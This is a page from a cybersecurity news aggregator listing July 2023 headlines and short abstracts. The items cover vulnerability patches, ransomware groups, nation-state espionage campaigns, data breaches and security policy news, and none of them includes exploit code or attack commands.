July 12, 2023 – Vulnerabilities
Citrix fixed a critical flaw in Secure Access Client for Ubuntu Full Text
Abstract
Citrix fixed a critical flaw affecting the Secure Access client for Ubuntu that could be exploited to achieve remote code execution. Citrix addressed a critical vulnerability, tracked as CVE-2023-24492 (CVSS score of 9.6), affecting the Secure Access...Security Affairs
July 12, 2023 – Criminals
Staying ahead of the “professionals”: The service-oriented ransomware crime industry Full Text
Abstract
The total amount of ransom paid since 2020 is estimated to be at least $2 billion, and this has both motivated and enabled the groups who are profiting from this activity to become more professional.Cyware
July 12, 2023 – Education
The Risks and Preventions of AI in Business: Safeguarding Against Potential Pitfalls Full Text
Abstract
Artificial intelligence (AI) holds immense potential for optimizing internal processes within businesses. However, it also comes with legitimate concerns regarding unauthorized use, including data loss risks and legal consequences. In this article, we will explore the risks associated with AI implementation and discuss measures to minimize damages. Additionally, we will examine regulatory initiatives by countries and ethical frameworks adopted by companies to regulate AI. Security risks AI phishing attacks Cybercriminals can leverage AI in various ways to enhance their phishing attacks and increase their chances of success. Here are some ways AI can be exploited for phishing: - Automated Phishing Campaigns: AI-powered tools can automate the creation and dissemination of phishing emails on a large scale. These tools can generate convincing email content, craft personalized messages, and mimic the writing style of a specific individual, making phishing attempts appear more legitThe Hacker News
July 12, 2023 – Criminals
Cl0p hacker operating from Russia-Ukraine war front line – exclusive Full Text
Abstract
CyberNews researchers discovered that at least one of the Cl0p ransomware gang masterminds is still residing in Ukraine. Original post at: https://cybernews.com/security/cl0p-hacker-hides-in-ukraine/ As the Cl0p ransomware gang continues to sow anxiety...Security Affairs
July 12, 2023 – Government
Biden’s Cyber Command and NSA Nominee Seen as a Pick for Continuity Full Text
Abstract
At his first Senate confirmation hearing on Wednesday, Air Force Lt. Gen. Timothy Haugh, Cyber Command’s deputy chief, will explain how he plans to fill the shoes of Paul Nakasone.Cyware
July 12, 2023 – Attack
Microsoft Thwarts Chinese Cyber Attack Targeting Western European Governments Full Text
Abstract
Microsoft on Tuesday revealed that it repelled a cyber attack staged by a Chinese nation-state actor targeting two dozen organizations, some of which include government agencies, in a cyber espionage campaign designed to acquire confidential data. The attacks, which commenced on May 15, 2023, entailed access to email accounts affecting approximately 25 entities and a small number of related individual consumer accounts. The tech giant attributed the campaign to Storm-0558, describing it as a nation-state activity group based out of China that primarily singles out government agencies in Western Europe. "They focus on espionage, data theft, and credential access," Microsoft said. "They are also known to use custom malware that Microsoft tracks as Cigril and Bling, for credential access." The breach is said to have been detected a month later on June 16, 2023, after an unidentified customer reported the anomalous email activity to the company. Microsoft saiThe Hacker News
July 12, 2023 – Vulnerabilities
Fortinet fixed a critical flaw in FortiOS and FortiProxy Full Text
Abstract
Fortinet warns of a critical vulnerability impacting FortiOS and FortiProxy that can allow remote attackers to perform arbitrary code execution. Fortinet has disclosed a critical vulnerability, tracked as CVE-2023-33308 (CVSS score 9.8), that impacts...Security Affairs
July 12, 2023 – Criminals
Cl0p Crime Group Adds 62 Ernst & Young Clients to Leak Sites Full Text
Abstract
The list of MOVEit cyberattack victims continues to grow. Sixty-two clients of Big Four accounting firm Ernst & Young now appear on the Clop ransomware group's data leak sites.Cyware
July 12, 2023 – Hacker
Chinese Hackers Deploy Microsoft-Signed Rootkit to Target Gaming Sector Full Text
Abstract
Cybersecurity researchers have unearthed a novel rootkit signed by Microsoft that's engineered to communicate with an actor-controlled attack infrastructure. Trend Micro has attributed the activity cluster to the same actor that was previously identified as behind the FiveSys rootkit, which came to light in October 2021. "This malicious actor originates from China and their main victims are the gaming sector in China," Trend Micro's Mahmoud Zohdy, Sherif Magdy, and Mohamed Fahmy said. Their malware seems to have passed through the Windows Hardware Quality Labs (WHQL) process for getting a valid signature. Multiple variants of the rootkit spanning eight different clusters have been discovered, with 75 such drivers signed using Microsoft's WHQL program in 2022 and 2023. Trend Micro's analysis of some of the samples has revealed the presence of debug messages in the source code, indicating that the operation is still in the development and testing phasThe Hacker News
July 12, 2023 – Attack
Microsoft mitigated an attack by Chinese threat actor Storm-0558 Full Text
Abstract
Microsoft announced it has mitigated a cyber attack by a China-linked threat actor, tracked as Storm-0558, which targeted customer emails. Microsoft announced it has mitigated an attack conducted by a China-linked threat actor, tracked as Storm-0558,...Security Affairs
July 12, 2023 – Vulnerabilities
Fortinet Patches Critical FortiOS Vulnerability Leading to Remote Code Execution Full Text
Abstract
The vulnerability impacts FortiOS and FortiProxy versions 7.2.x and 7.0.x and was resolved in FortiOS versions 7.4.0, 7.2.4, and 7.0.11, and FortiProxy versions 7.2.3 and 7.0.10.Cyware
July 12, 2023 – Denial Of Service
DDoS Attacks Soar by 168% on Government Services, Report Warns Full Text
Abstract
According to StormWall’s Q2 2023 Report, the United States, India, and China remain the most heavily targeted countries, bearing the brunt of the escalating DDoS attacks.Cyware
July 12, 2023 – Vulnerabilities
SAP Patches Critical Vulnerability in ECC and S/4HANA Products Full Text
Abstract
German enterprise software maker SAP on Tuesday announced the release of 16 new security notes as part of its July 2023 Security Patch Day. In addition, updates were announced for two previously released notes.Cyware
July 12, 2023 – Government
Pro-Chinese Twitter Accounts Seek to Expand Beijing’s Influence in Latin America Full Text
Abstract
Three Twitter accounts that appear to have links to the Chinese government have been spreading propaganda in Latin America and successfully avoided Twitter's efforts to label state media, researchers said in an analysis published Tuesday.Cyware
July 12, 2023 – Policy and Law
Two more lawsuits filed against Scranton cardiology group over data breach Full Text
Abstract
Cybercriminals attempted to access accounts of a Scranton couple who are among clients whose personal information was exposed in a data breach at a Commonwealth Health cardiology group's practice, according to a proposed class-action lawsuit.Cyware
July 12, 2023 – Cryptocurrency
Python-Based PyLoose Fileless Attack Targets Cloud Workloads for Cryptocurrency Mining Full Text
Abstract
A new fileless attack dubbed PyLoose has been observed striking cloud workloads with the goal of delivering a cryptocurrency miner, new findings from Wiz reveal. "The attack consists of Python code that loads an XMRig Miner directly into memory using memfd, a known Linux fileless technique," security researchers Avigayil Mechtinger, Oren Ofer, and Itamar Gilad said. "This is the first publicly documented Python-based fileless attack targeting cloud workloads in the wild." The cloud security firm said it found nearly 200 instances where the attack method was employed for cryptocurrency mining. No other details about the threat actor are currently known other than the fact that they possess sophisticated capabilities. In the infection chain documented by Wiz, initial access is achieved through the exploitation of a publicly accessible Jupyter Notebook service that allowed for the execution of system commands using Python modules. PyLoose, first detected onThe Hacker News
July 12, 2023 – Attack
Unpatched Office zero-day CVE-2023-36884 actively exploited in targeted attacks Full Text
Abstract
Microsoft warned today that an unpatched zero-day in multiple Windows and Office products was actively exploited in the wild. Microsoft disclosed an unpatched zero-day vulnerability in multiple Windows and Office products that has been actively exploited...Security Affairs
July 12, 2023 – Vulnerabilities
Update: Apple’s Rapid Security Response Patches Causing Website Access Issues Full Text
Abstract
Apple has pulled its latest Rapid Security Response updates for iOS and macOS after users complained that they were getting errors when accessing some websites through Safari.Cyware
July 12, 2023 – Vulnerabilities
Microsoft Releases Patches for 132 Vulnerabilities, Including 6 Under Active Attack Full Text
Abstract
Microsoft on Tuesday released updates to address a total of 132 new security flaws spanning its software, including six zero-day flaws that it said have been actively exploited in the wild. Of the 132 vulnerabilities, nine are rated Critical, 122 are rated Important in severity, and one has been assigned a severity rating of "None." This is in addition to eight flaws the tech giant patched in its Chromium-based Edge browser towards the end of last month. The list of issues that have come under active exploitation is as follows - CVE-2023-32046 (CVSS score: 7.8) - Windows MSHTML Platform Elevation of Privilege Vulnerability CVE-2023-32049 (CVSS score: 8.8) - Windows SmartScreen Security Feature Bypass Vulnerability CVE-2023-35311 (CVSS score: 8.8) - Microsoft Outlook Security Feature Bypass Vulnerability CVE-2023-36874 (CVSS score: 7.8) - Windows Error Reporting Service Elevation of Privilege Vulnerability CVE-2023-36884 (CVSS score: 8.3) - Office and WindowsThe Hacker News
July 11, 2023 – Breach
HCA Healthcare data breach impacted 11 million patients Full Text
Abstract
HCA Healthcare disclosed a data breach that exposed the personal information of roughly 11 million patients. HCA Healthcare this week announced that the personal information of roughly 11 million patients was compromised in a data breach. The organization...Security Affairs
July 11, 2023 – Malware
New TOITOIN Trojan Targets LATAM Full Text
Abstract
Businesses in the Latin American region are facing a new threat from a sophisticated malicious campaign distributing the TOITOIN trojan. Moreover, the campaign uses Amazon EC2 instances to evade domain-based detections. It is crucial for organizations to maintain a high level of vigilance against e ...Cyware
July 11, 2023 – Vulnerabilities
Hackers Exploit Windows Policy Loophole to Forge Kernel-Mode Driver Signatures Full Text
Abstract
A Microsoft Windows policy loophole has been observed being exploited primarily by native Chinese-speaking threat actors to forge signatures on kernel-mode drivers. "Actors are leveraging multiple open-source tools that alter the signing date of kernel mode drivers to load malicious and unverified drivers signed with expired certificates," Cisco Talos said in an exhaustive two-part report shared with The Hacker News. "This is a major threat, as access to the kernel provides complete access to a system, and therefore total compromise." Following responsible disclosure, Microsoft said it has taken steps to block all certificates to mitigate the threat. It further stated that its investigation found "the activity was limited to the abuse of several developer program accounts and that no Microsoft account compromise has been identified." The tech giant, besides suspending developer program accounts involved in the incident, emphasized that the threat aThe Hacker News
July 11, 2023 – Vulnerabilities
Apple issued Rapid Security Response updates to fix a zero-day but pulled them due to a Safari bug Full Text
Abstract
Apple released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address an actively exploited zero-day. Apple has released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address a...Security Affairs
July 11, 2023 – Malware
Purr-fectly Crafted for Macs: Charming Kitten Introduces NokNok Malware Full Text
Abstract
Security researchers uncovered a new campaign by Charming Kitten (APT42) targeting Windows and macOS systems using different malware payloads. A new type of malware called NokNok is specifically used for targeting macOS systems. For Windows, adversaries leverage PowerShell code and an LNK file to ...Cyware
July 11, 2023 – Education
How to Apply MITRE ATT&CK to Your Organization Full Text
Abstract
Discover all the ways MITRE ATT&CK can help you defend your organization. Build your security strategy and policies by making the most of this important framework. What is the MITRE ATT&CK Framework? MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a widely adopted framework and knowledge base that outlines and categorizes the tactics, techniques, and procedures (TTPs) used in cyberattacks. Created by the nonprofit organization MITRE, this framework provides security professionals with insights and context that can help them comprehend, identify, and mitigate cyber threats effectively. The techniques and tactics in the framework are organized in a dynamic matrix. This makes navigation easy and also provides a holistic view of the entire spectrum of adversary behaviors. As a result, the framework is more actionable and usable than if it were a static list. The MITRE ATT&CK Framework can be found here: https://attack.mitre.org/ Look Out: MIThe Hacker News
July 11, 2023 – Vulnerabilities
VMware warns customers of exploit available for critical vRealize RCE flaw CVE-2023-20864 Full Text
Abstract
VMware warns customers of the public availability of an exploit code for the RCE vulnerability CVE-2023-20864 affecting vRealize. VMware warned customers of the availability of an exploit code for the critical RCE vulnerability CVE-2023-20864 in the VMware...Security Affairs
July 11, 2023 – Vulnerabilities
Owncast, EaseProbe Security Vulnerabilities Revealed Full Text
Abstract
Oxeye has uncovered two critical security vulnerabilities and recommends immediate action to mitigate risk. The vulnerabilities were discovered in Owncast (CVE-2023-3188) and EaseProbe (CVE-2023-33967), two open-source platforms written in Go.Cyware
July 11, 2023 – Cryptocurrency
SCARLETEEL Cryptojacking Campaign Exploiting AWS Fargate in Ongoing Campaign Full Text
Abstract
Cloud environments continue to be at the receiving end of an ongoing advanced attack campaign dubbed SCARLETEEL, with the threat actors now setting their sights on Amazon Web Services (AWS) Fargate. "Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture," Sysdig security researcher Alessandro Brucato said in a new report shared with The Hacker News. SCARLETEEL was first exposed by the cybersecurity company in February 2023, detailing a sophisticated attack chain that culminated in the theft of proprietary data from AWS infrastructure and the deployment of cryptocurrency miners to profit off the compromised systems' resources illegally. A follow-up analysis by Cado Security uncovered potential links to a prolific cryptojacking group known as TeamTNT, although Sysdig told The Hacker News that it "could be someThe Hacker News
July 11, 2023 – Criminals
Cybercriminals Evolve Antidetect Tooling for Mobile OS-Based Fraud Full Text
Abstract
Resecurity identified the emergence of adversarial Android-based anti-detect tooling for mobile OS-based fraud. Resecurity has identified the emergence of adversarial mobile Android-based tools (called "mobile anti-detects"), like Enclave and McFly,...Security Affairs
July 11, 2023 – Breach
HCA Healthcare Reports Breach of 11 Million Patients’ Personal Data Full Text
Abstract
In a website notice, HCA confirmed that the data includes “information used for email messages, such as reminders that patients may wish to schedule an appointment and education on healthcare programs and services.”Cyware
July 11, 2023 – Ransomware
Beware of Big Head Ransomware: Spreading Through Fake Windows Updates Full Text
Abstract
A developing piece of ransomware called Big Head is being distributed as part of a malvertising campaign that takes the form of bogus Microsoft Windows updates and Word installers. Big Head was first documented by Fortinet FortiGuard Labs last month, when it discovered multiple variants of the ransomware that are designed to encrypt files on victims' machines in exchange for a cryptocurrency payment. "One Big Head ransomware variant displays a fake Windows Update, potentially indicating that the ransomware was also distributed as a fake Windows Update," Fortinet researchers said at the time. "One of the variants has a Microsoft Word icon and was likely distributed as counterfeit software." A majority of the Big Head samples have been submitted so far from the U.S., Spain, France, and Turkey. In a new analysis of the .NET-based ransomware, Trend Micro detailed its inner workings, calling out its ability to deploy three encrypted binaries: 1.exe to propagThe Hacker News
July 11, 2023 – Malware
Six Malicious Python Packages in the PyPI Targeting Windows Users Full Text
Abstract
The attackers imitated the W4SP attack group by using custom entry points and leveraging free file hosting services to remain undetected during the installation or execution process.Cyware
July 11, 2023 – Vulnerabilities
Apple Issues Urgent Patch for Zero-Day Flaw Targeting iOS, iPadOS, macOS, and Safari Full Text
Abstract
Apple has released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address a zero-day flaw that it said has been actively exploited in the wild. The WebKit bug, cataloged as CVE-2023-37450, could allow threat actors to achieve arbitrary code execution when processing specially crafted web content. The iPhone maker said it addressed the issue with improved checks. Credited with discovering and reporting the flaw is an anonymous researcher. As with most cases like this, there are scant details about the nature and the scale of the attacks and the identity of the threat actor behind them. But Apple noted in a terse advisory that it's "aware of a report that this issue may have been actively exploited." The updates, iOS 16.5.1 (a), iPadOS 16.5.1 (a), macOS Ventura 13.4.1 (a), and Safari 16.5.2, are available for devices running the following operating system versions: iOS 16.5.1 and iPadOS 16.5.1 macOS Ventura 13.4.1 macOS BigThe Hacker News
July 11, 2023 – Attack
Australian Infrastructure Company Ventia Hit With Cyberattack Full Text
Abstract
The Australian infrastructure services provider Ventia is dealing with a cyberattack that began this weekend. On Saturday, the company said it identified a cyber intrusion and took some “key systems” offline to contain the incident.Cyware
July 10, 2023 – Phishing
RomCom hackers target NATO Summit attendees in phishing attacks Full Text
Abstract
A threat actor referred to as 'RomCom' has been targeting organizations supporting Ukraine and guests of the upcoming NATO Summit set to start tomorrow in Vilnius, Lithuania.BleepingComputer
July 10, 2023 – Criminals
Genesis Market gang tries to sell platform after FBI disruption Full Text
Abstract
Unlike its competitors, Genesis Market did not just sell stolen data and credentials but also provided a platform to criminals that allowed them to weaponize that data using a custom browser extension to impersonate victims.Cyware
July 10, 2023 – Solution
New Mozilla Feature Blocks Risky Add-Ons on Specific Websites to Safeguard User Security Full Text
Abstract
Mozilla has announced that some add-ons may be blocked from running on certain sites as part of a new feature called Quarantined Domains. "We have introduced a new back-end feature to only allow some extensions monitored by Mozilla to run on specific websites for various reasons, including security concerns," the company said in its Release Notes for Firefox 115.0 released last week. The company said the openness afforded by the add-on ecosystem could be exploited by malicious actors to their advantage. "This feature allows us to prevent attacks by malicious actors targeting specific domains when we have reason to believe there may be malicious add-ons we have not yet discovered," Mozilla said in a separate support document. Users are expected to have more control over the setting for each add-on, starting with Firefox version 116. That said, it can be disabled by loading "about:config" in the address bar and setting "extensions.quarantineThe Hacker News
July 10, 2023 – Vulnerabilities
Experts released PoC exploit for Ubiquiti EdgeRouter flaw Full Text
Abstract
A Proof-of-Concept (PoC) exploit for the CVE-2023-31998 vulnerability in the Ubiquiti EdgeRouter has been publicly released. The CVE-2023-31998 flaw (CVSS v3 5.9) is a heap overflow issue impacting Ubiquiti EdgeRouters and AirCubes; an attacker can exploit...Security Affairs
July 10, 2023 – Malware
VMware warns of exploit available for critical vRealize RCE bug Full Text
Abstract
VMware warned customers today that exploit code is now available for a critical vulnerability in the VMware Aria Operations for Logs analysis tool, which helps admins manage terabytes worth of app and infrastructure logs in large-scale environments.BleepingComputer
July 10, 2023 – Vulnerabilities
PoC Exploit Published for Recent Ubiquiti EdgeRouter Vulnerability Full Text
Abstract
A recently patched vulnerability in Ubiquiti EdgeRouter and AirCube devices could be exploited to execute arbitrary code, vulnerability reporting firm SSD Secure Disclosure warns.Cyware
July 10, 2023 – Malware
New TOITOIN Banking Trojan Targeting Latin American Businesses Full Text
Abstract
Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023. "This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage," Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week. "These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks." The six-stage endeavor has all the hallmarks of a well-crafted attack sequence, beginning with a phishing email containing an embedded link that points to a ZIP archive hosted on an Amazon EC2 instance to evade domain-based detections. The email messages leverage an invoice-themed lure to t...The Hacker News
July 10, 2023 – Attack
RomCom RAT attackers target groups supporting NATO membership of Ukraine Full Text
Abstract
Threat actors are targeting NATO and groups supporting Ukraine in a spear-phishing campaign distributing the RomCom RAT. On July 4, the BlackBerry Threat Research and Intelligence team uncovered a spear phishing campaign aimed at an organization...Security Affairs
July 10, 2023 – Vulnerabilities
Apple releases emergency update to fix zero-day exploited in attacks Full Text
Abstract
Apple has issued a new round of Rapid Security Response (RSR) updates to address a new zero-day bug exploited in attacks and impacting fully-patched iPhones, Macs, and iPads.BleepingComputer
July 10, 2023 – Solution
Honeywell Boosting OT Cybersecurity Offering With Acquisition of SCADAfence Full Text
Abstract
Honeywell has agreed to acquire SCADAfence for an undisclosed amount and plans on integrating its solutions into the company’s Forge Cybersecurity+ suite. The deal is expected to close in the second half of the year.Cyware
July 10, 2023 – General
Global Retailers Must Keep an Eye on Their SaaS Stack Full Text
Abstract
Brick-and-mortar retailers and e-commerce sellers may be locked in a fierce battle for market share, but one area both can agree on is the need to secure their SaaS stack. From communications tools to order management and fulfillment systems, much of today's critical retail software lives in SaaS apps in the cloud. Securing those applications is crucial to ongoing operations, chain management, and business continuity. Breaches in retail send out seismic shockwaves. Ten years later, many still remember one national retailer that had 40 million credit card records stolen. Those attacks have continued. According to Verizon's Data Breach Investigations Report, last year saw 629 cybersecurity incidents in the sector. Clearly, retailers must take concrete steps to secure their SaaS stack. And yet, securing applications is complicated. Retailers tend to have multiple tenants of apps, which leads to confusion over which instances of the application were already secured and whic...The Hacker News
July 10, 2023 – Breach
A flaw in Revolut US payments resulted in the theft of $20 Million Full Text
Abstract
A zero-day vulnerability in the Revolut payment systems allowed threat actors to steal more than $20 million in early 2022. In early 2022, threat actors exploited a zero-day flaw in Revolut payment systems to steal more than $20 million, reported...Security Affairs
July 10, 2023 – Insider Threat
Former employee charged for attacking water treatment plant Full Text
Abstract
A former employee of Discovery Bay Water Treatment Facility in California was indicted by a federal grand jury for intentionally attempting to cause malfunction to the facility's safety and protection systems.BleepingComputer
July 10, 2023 – Breach
35 Million Indonesians’ Passport Data for Sale on Dark Web for $10K Full Text
Abstract
Indonesian security researcher Teguh Aprianto revealed on Twitter last week that a hacker had put up for sale Indonesian passport holders' details including their full names, birth dates, gender, passport numbers, and passport validity dates.Cyware
July 10, 2023 – Attack
RomCom RAT Targeting NATO and Ukraine Support Groups Full Text
Abstract
The threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the upcoming NATO Summit in Vilnius as well as an identified organization supporting Ukraine abroad. The findings come from the BlackBerry Threat Research and Intelligence team, which found two malicious documents submitted from a Hungarian IP address on July 4, 2023. RomCom, also tracked under the names Tropical Scorpius, UNC2596, and Void Rabisu, was recently observed staging cyber attacks against politicians in Ukraine who are working closely with Western countries and a U.S.-based healthcare organization involved with aiding refugees fleeing the war-torn country. Attack chains mounted by the group are geopolitically motivated and have employed spear-phishing emails to point victims to cloned websites hosting trojanized versions of popular software. Targets include militaries, food supply chains, and IT companies. The latest lure documents identified by BlackBerry impersonate Ukrainia...The Hacker News
July 10, 2023 – Privacy
France’s government is giving the police more surveillance power Full Text
Abstract
The French government is going to grant law enforcement the power to spy on suspects through smartphones and other devices. French legislators are going to approve a justice reform bill that also gives more power to law enforcement, allowing them...Security Affairs
July 10, 2023 – Breach
Razer investigates data breach claims, resets user sessions Full Text
Abstract
Gaming gear company Razer reacted to recent rumors of a massive data breach with a short statement on Twitter, letting users know that they started an investigation into the matter.BleepingComputer
July 10, 2023 – General
ISACA joins ECSO to strengthen cybersecurity and digital skills in Europe Full Text
Abstract
ISACA is joining the European Cyber Security Organisation (ECSO). The membership will work to accelerate ECSO and ISACA’s shared commitment to advancing cybersecurity, fostering collaboration and driving digital trust across Europe.Cyware
July 10, 2023 – Criminals
Hackers Steal $20 Million by Exploiting Flaw in Revolut’s Payment Systems Full Text
Abstract
Malicious actors exploited an unknown flaw in Revolut's payment systems to steal more than $20 million of the company's funds in early 2022. The development was reported by the Financial Times, citing multiple unnamed sources with knowledge of the incident. The breach has not been disclosed publicly. The fault stemmed from discrepancies between Revolut's U.S. and European systems, causing funds to be erroneously refunded using its own money when some transactions were declined. The problem was first detected in late 2021. But before it could be closed, the report said organized criminal groups leveraged the loophole by "encouraging individuals to try to make expensive purchases that would go on to be declined." The refunded amounts would then be withdrawn from ATMs. The exact technical details associated with the flaw are currently unclear. About $23 million was stolen in total, with some funds recovered by pursuing those who had withdrawn cash. The mass...The Hacker News
July 10, 2023 – Solution
Streamlining security operations with automated incident response Full Text
Abstract
Automated incident response solutions help reduce the mean time to respond to incidents, address known security threats, and also minimize alert fatigue. Learn more about these solutions from Wazuh, the open source XDR/SIEM platform.BleepingComputer
July 10, 2023 – General
Midyear Health Data Breach Analysis: The Top Culprits Full Text
Abstract
The HHS HIPAA Breach Reporting Tool shows that 336 major health data breaches affected nearly 41.4 million individuals between January 1st and June 30th this year - nearly double the number affected during the same period last year.Cyware
July 10, 2023 – Phishing
New Phishing Attack Spoofs Microsoft 365 Authentication System Full Text
Abstract
According to researchers at Vade, the attack email includes a harmful HTML attachment with JavaScript code. This code is designed to gather the recipient’s email address and modify the page using data from a callback function’s variable.Cyware
July 09, 2023
Charming Kitten hackers use new ‘NokNok’ malware for macOS Full Text
Abstract
Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems.BleepingComputer
July 9, 2023 – Malware
Two spyware sending data of more than 1.5M users to China were found in Google Play Store Full Text
Abstract
Two apps on the Google Play Store with more than 1.5 million downloads have been discovered spying on users and sending data to China. Researchers from cybersecurity firm Pradeo discovered two malicious apps on Google Play hiding spyware and spying...Security Affairs
July 9, 2023 – General
Security Affairs newsletter Round 427 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Google...Security Affairs
July 8, 2023 – Ransomware
Tailing Big Head Ransomware’s Variants, Tactics, and Impact Full Text
Abstract
The Big Head ransomware displays a fake Windows update to deceive victims, communicates with the threat actor via a Telegram bot, and drops ransom notes with contact information.Cyware
July 08, 2023 – Privacy
Two Spyware Apps on Google Play with 1.5 Million Users Sending Data to China Full Text
Abstract
Two file management apps on the Google Play Store have been discovered to be spyware, putting the privacy and security of up to 1.5 million Android users at risk. These apps engage in deceptive behaviour and secretly send sensitive user data to malicious servers in China. Pradeo, a leading mobile security company, has uncovered this alarming infiltration. The report shows that both spyware apps, namely File Recovery and Data Recovery (com.spot.music.filedate) with over 1 million installs, and File Manager (com.file.box.master.gkd) with over 500,000 installs, are developed by the same group. These seemingly harmless Android apps use similar malicious tactics and automatically launch when the device reboots without user input. Contrary to what they claim on the Google Play Store, where both apps assure users that no data is collected, Pradeo's analytics engine has found that various personal information is collected without users' knowledge. Stolen data includes contact list...The Hacker News
July 8, 2023 – Malware
WISE REMOTE Stealer Unleashed: Unveiling Its Multifaceted Malicious Arsenal Full Text
Abstract
The WISE REMOTE Stealer is an advanced information stealer and Remote Access Trojan (RAT) that is coded in the Go programming language and utilizes code manipulation techniques to evade antivirus detection, making it difficult to detect and mitigate.Cyware
July 8, 2023 – Breach
Global Translation Service Exposed Highly Sensitive Records Online Full Text
Abstract
Website Planet‘s security researcher Jeremiah Fowler discovered a non-password-protected database that contained over 25,000 records, all publicly exposed, including ‘highly sensitive’ documents.Cyware
July 8, 2023 – Vulnerabilities
Google addressed 3 actively exploited flaws in Android Full Text
Abstract
Google released July security updates for Android that addressed tens of vulnerabilities, including three actively exploited flaws. July security updates for Android addressed more than 40 vulnerabilities, including three flaws that were actively...Security Affairs
July 8, 2023 – Government
Vulnerabilities in PiiGAB Product Could Expose Industrial Organizations to Attacks Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) on Thursday published an advisory describing the vulnerabilities discovered by researchers at Radboud University in PiiGAB M-Bus 900s gateway/converter.Cyware
July 8, 2023
Iran-linked APT TA453 targets Windows and macOS systems Full Text
Abstract
Iran-linked APT group tracked as TA453 has been linked to a new malware campaign targeting both Windows and macOS systems. The Iran-linked threat actor TA453 has been linked to a malware campaign that targets both Windows and macOS. TA453 is a nation-state...Security Affairs
July 7, 2023 – Government
TMF announces five new digital services and cybersecurity investments Full Text
Abstract
The Labor Department will use the $15.2 million in the most recent batch of funding for zero-trust architecture. The EPA will put its $2.5 million toward the cybersecurity of its analytical radiation data system.Cyware
July 07, 2023 – Phishing
Vishing Goes High-Tech: New ‘Letscall’ Malware Employs Voice Traffic Routing Full Text
Abstract
Researchers have issued a warning about an emerging and advanced form of voice phishing (vishing) known as "Letscall." This technique is currently targeting individuals in South Korea. The criminals behind "Letscall" employ a multi-step attack to deceive victims into downloading malicious apps from a counterfeit Google Play Store website. Once the malicious software is installed, it redirects incoming calls to a call center under the control of the criminals. Trained operators posing as bank employees then extract sensitive information from unsuspecting victims. To facilitate the routing of voice traffic, "Letscall" utilizes cutting-edge technologies such as voice over IP (VoIP) and WebRTC. It also makes use of Session Traversal Utilities for NAT (STUN) and Traversal Using Relays around NAT (TURN) protocols, including Google STUN servers, to ensure high-quality phone or video calls and bypass NAT and firewall restrictions. The "Letscall"...The Hacker News
July 7, 2023 – Breach
Bangladesh government website leaked data of millions of citizens Full Text
Abstract
A researcher recently discovered that a Bangladesh government website leaks the personal data of citizens. The researcher Viktor Markopoulos discovered a Bangladeshi government website that was leaking the personal information of millions of Bangladesh...Security Affairs
July 7, 2023 – General
Cybercriminals can Break Voice Authentication with 99% Success Rate Full Text
Abstract
Computer scientists at the University of Waterloo have discovered a method of attack that can successfully bypass voice authentication security systems with up to a 99% success rate after only six tries.Cyware
July 07, 2023 – Vulnerabilities
Another Critical Unauthenticated SQLi Flaw Discovered in MOVEit Transfer Software Full Text
Abstract
Progress Software has announced the discovery and patching of a critical SQL injection vulnerability in MOVEit Transfer, popular software used for secure file transfer. In addition, Progress Software has patched two other high-severity vulnerabilities. The identified SQL injection vulnerability, tagged as CVE-2023-36934, could potentially allow unauthenticated attackers to gain unauthorized access to the MOVEit Transfer database. SQL injection vulnerabilities are a well-known and dangerous security flaw that allows attackers to manipulate databases and run any code they want. Attackers can send specifically designed payloads to certain endpoints of the affected application, which could change or expose sensitive data in the database. The reason CVE-2023-36934 is so critical is that it can be exploited without having to be logged in. This means that even attackers without valid credentials can potentially exploit the vulnerability. However, as of now, there have been no reports of...The Hacker News
July 7, 2023 – Policy and Law
A man has been charged with a cyber attack on the Discovery Bay water treatment facility Full Text
Abstract
A man from Tracy, California, has been charged with a computer attack on the Discovery Bay water treatment facility. Rambler Gallo (53), a man from Tracy (California) has been charged with intentionally causing damage to a computer after he allegedly...Security Affairs
July 7, 2023 – Government
Truebot’s Activity Spikes, U.S and Canada Authorities Issue Warning Full Text
Abstract
A joint advisory from the CISA, the FBI, the MS-ISAC, and the Canadian Centre for Cyber Security (CCCS) reported a rise in the use of the Truebot malware by threat actors. Notably, these actors are increasingly exploiting the CVE-2022-31199 flaw to target organizations in the U.S. and Canada with ...Cyware
July 07, 2023 – Vulnerabilities
Mastodon Social Network Patches Critical Flaws Allowing Server Takeover Full Text
Abstract
Mastodon, a popular decentralized social network, has released a security update to fix critical vulnerabilities that could expose millions of users to potential attacks. Mastodon is known for its federated model, consisting of thousands of separate servers called "instances," and it has over 14 million users across more than 20,000 instances. The most critical vulnerability, CVE-2023-36460, allows hackers to exploit a flaw in the media attachments feature, creating and overwriting files in any location the software could access on an instance. This software vulnerability could be used for DoS and arbitrary remote code execution attacks, posing a significant threat to users and the broader Internet ecosystem. If an attacker gains control over multiple instances, they could cause harm by instructing users to download malicious applications or even bring down the entire Mastodon infrastructure. Fortunately, there is no evidence of this vulnerability being exploited so fa...The Hacker News
July 7, 2023 – Vulnerabilities
Progress warns customers of a new critical flaw in MOVEit Transfer software Full Text
Abstract
Progress released security patches for a new critical SQL injection vulnerability affecting its MOVEit Transfer software. Progress is informing customers of a new critical SQL injection vulnerability, tracked as CVE-2023-36934, in its MOVEit Transfer...Security Affairs
July 7, 2023 – General
ChatGPT’s unknown potential keeps us guessing Full Text
Abstract
A survey by Malwarebytes revealed that a majority of respondents do not trust the information produced by ChatGPT and believe it poses potential safety and security risks.Cyware
July 07, 2023 – Solution
Close Security Gaps with Continuous Threat Exposure Management Full Text
Abstract
